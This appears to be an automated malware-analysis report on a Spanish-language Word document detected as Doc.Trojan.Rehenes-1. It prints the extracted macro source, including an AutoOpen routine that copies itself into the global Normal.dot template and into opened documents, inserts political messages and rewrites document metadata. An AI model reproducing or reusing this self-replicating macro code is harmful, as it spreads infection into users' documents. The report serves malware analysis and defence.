Verdict: MALICIOUS
Risk Score: 200

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV and contains a VBA macro with an AutoOpen function, indicating it is designed to execute automatically upon opening. The document body's text, 'en memoria de los caídos en la crisis de los rehenes', is likely a lure to encourage macro execution. The VBA macro itself appears to be a tool for managing macros, but its presence in conjunction with the AutoOpen function and the ClamAV detection strongly suggests it's part of a malicious chain.
Heuristics (4)

- ClamAV: Doc.Trojan.Rehenes-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Rehenes-1
- VBA macros detected (medium, 1 related finding, OLE_VBA_MACROS): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6679 bytes |

SHA-256: e89a586cec3a2a6b5a185680eb809fdbb1e927a6a3fa5c8b9dee40006cb62048
Detection: ClamAV: Doc.Trojan.Rehenes-1
Obfuscation or payload: unlikely
Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "HerramMacro"
Public Sub MAIN()
Attribute MAIN.VB_Description = "Ejecuta, crea, borra o revisa una macro."
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.HerramMacro.MAIN"
Dim botón
ReDim CuadroLista1__$(0)
ReDim CuadroLista2__$(0)
ReDim ListaDesple1__$(3)
ListaDesple1__$(0) = "Todas las plantillas activas"
ListaDesple1__$(1) = "Normal.dot (plantilla global)"
ListaDesple1__$(2) = "Comandos de Word"
WordBasic.BeginDialog 445, 310, "Macros"
WordBasic.Text 10, 6, 159, 13, "&Nombre de la Macro:", "Texto1"
WordBasic.TextBox 10, 22, 250, 18, "Cuadro_de_texto1"
WordBasic.ListBox 19, 43, 243, 152, CuadroLista1__$(), "Cuadro_de_lista1"
WordBasic.Text 19, 201, 175, 13, "M&acros disponibles en:", "Texto2"
WordBasic.DropListBox 19, 216, 400, 50, ListaDesple1__$(), "ListaDesplegable1"
WordBasic.Text 19, 240, 91, 13, "D&escripción", "Texto4"
WordBasic.ListBox 19, 256, 402, 50, CuadroLista2__$(), "Cuadro_de_lista2"
WordBasic.PushButton 286, 10, 140, 21, "Graba&r", "Presionar1"
WordBasic.CancelButton 286, 35, 140, 21
WordBasic.PushButton 286, 65, 140, 21, "Ejecutar", "Presionar2"
WordBasic.PushButton 286, 90, 140, 21, "Crear", "Presionar3"
WordBasic.PushButton 286, 115, 140, 21, "Eliminar", "Presionar4"
WordBasic.PushButton 286, 145, 140, 21, "&Organizador...", "Presionar5"
WordBasic.EndDialog
Dim diálogoEjem As Object: Set diálogoEjem = WordBasic.CurValues.UserDialog
botón = WordBasic.Dialog.UserDialog(diálogoEjem)
End Sub
Attribute VB_Name = "autoOpen"
Public Sub MAIN()
Dim micro$
Dim globo$
Dim macro$
On Error GoTo -1: On Error GoTo Chesu
WordBasic.FileSummaryInfo Update:=1
Dim Keiko As Object: Set Keiko = WordBasic.DialogRecord.FileSummaryInfo(False)
WordBasic.CurValues.FileSummaryInfo Keiko
micro$ = Keiko.Directory + "\" + Keiko.FileName + ":autoOpen"
globo$ = "Global:autoOpen"
macro$ = LCase(WordBasic.[Right$](WordBasic.[MacroFileName$](WordBasic.[MacroName$](0)), 10))
If macro$ = "normal.dot" Then
WordBasic.MacroCopy globo$, micro$
micro$ = Keiko.Directory + "\" + Keiko.FileName + ":HerramMacro"
globo$ = "Global:HerramMacro"
WordBasic.MacroCopy globo$, micro$
Else
WordBasic.MacroCopy micro$, globo$
micro$ = Keiko.Directory + "\" + Keiko.FileName + ":HerramMacro"
globo$ = "Global:HerramMacro"
WordBasic.MacroCopy micro$, globo$
End If
WordBasic.FileSaveAs Format:=1
GoTo Sigue
Chesu:
On Error GoTo -1: On Error GoTo 0
Sigue:
Abracadabra
End Sub
Private Sub Abracadabra()
Dim buejn$
Dim Valx$
RandomWord
Select Case Rnd()
Case Is < 0.4
buejn$ = "Fujimori al 2005"
Case Is > 0.9
buejn$ = "fuera clones malignos "
Case Is < 0.5
buejn$ = "libertad! 22 de Abril de 1997 "
Case Is > 0.8
buejn$ = "¡¡¡La pareja del año: Fujimori y Beatriz Boza!!! Es lo que dice Susana, no se si es por celosa o porque le gusta que Betty sea mi calentao"
Case Is < 0.6
buejn$ = "en memoria de los caídos en la crisis de los rehenes "
Case Is > 0.7
buejn$ = "Para conseguir el antivirus contactarse con nicolas@amauta.rcp.net.pe y preguntar por el Sr. Lúcar o con el Sr Montesinos a montesinos@colina.sin.mil.pe"
Case Else
buejn$ = "¿Alumno de una conocida Universidad del Perú, Sr. José Martínez? "
End Select
WordBasic.Insert buejn$
WordBasic.StartOfDocument
WordBasic.FileSummaryInfo Title:="Crisis de los Rehenes"
WordBasic.FileSummaryInfo Subject:="Operativo Chavín de Huántar"
WordBasic.FileSummaryInfo Author:="Alberto Fujimori"
WordBasic.FileSummaryInfo Keywords:="WM.Fujimori"
On Error GoTo -1: On Error GoTo Chesu
WordBasic.FileSave
GoTo Yata
Chesu:
WordBasic.MsgBox "Microsoft Word editará el documento pero con ciertas dificultades. Se recomienda quitar la protección contra escritura del disco."
GoTo Alaproxima
Yata:
Select Cas
```

... (truncated)